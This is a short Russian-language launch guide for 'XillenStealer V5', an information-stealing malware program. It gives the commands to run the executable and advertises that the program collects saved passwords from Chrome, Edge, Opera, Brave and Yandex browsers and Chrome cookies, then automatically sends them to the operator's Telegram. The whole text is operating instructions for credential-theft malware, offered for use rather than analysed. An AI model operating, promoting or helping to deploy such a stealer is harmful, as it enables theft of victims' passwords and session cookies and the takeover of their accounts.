╔══════════════════════════════════════════════════════════╗
║          XILLENSTEALER V5 - ЗАПУСК                       ║
╚══════════════════════════════════════════════════════════╝

✅ ВСЁ ГОТОВО К ЗАПУСКУ!

📋 КОМАНДА ДЛЯ ЗАПУСКА:
=====================

    cd C:\Users\user\Desktop\XillenStealer-main\XillenStealer-V5-CPP
    xillen_v5.exe

ИЛИ ПРОСТО:

    .\xillen_v5.exe

═══════════════════════════════════════════════════════════

🎯 ЧТО ДЕЛАЕТ ПРОГРАММА:

    ✅ Собирает ПАРОЛИ из Chrome
    ✅ Собирает КУКИ из Chrome  
    ✅ Собирает ПАРОЛИ из Edge
    ✅ Собирает ПАРОЛИ из Opera
    ✅ Собирает ПАРОЛИ из Brave
    ✅ Собирает ПАРОЛИ из Yandex
    ✅ ОТПРАВЛЯЕТ в TELEGRAM

═══════════════════════════════════════════════════════════

📊 ВЫ УВИДИТЕ:

    Название браузера
    Путь к файлам с паролями
    Размер файлов
    
═══════════════════════════════════════════════════════════

🔐 TELEGRAM:

    Автоматически отправит данные в ваш Telegram
    
═══════════════════════════════════════════════════════════

⚡ НАЖМИ ENTER И ЗАПУСКАЙ!
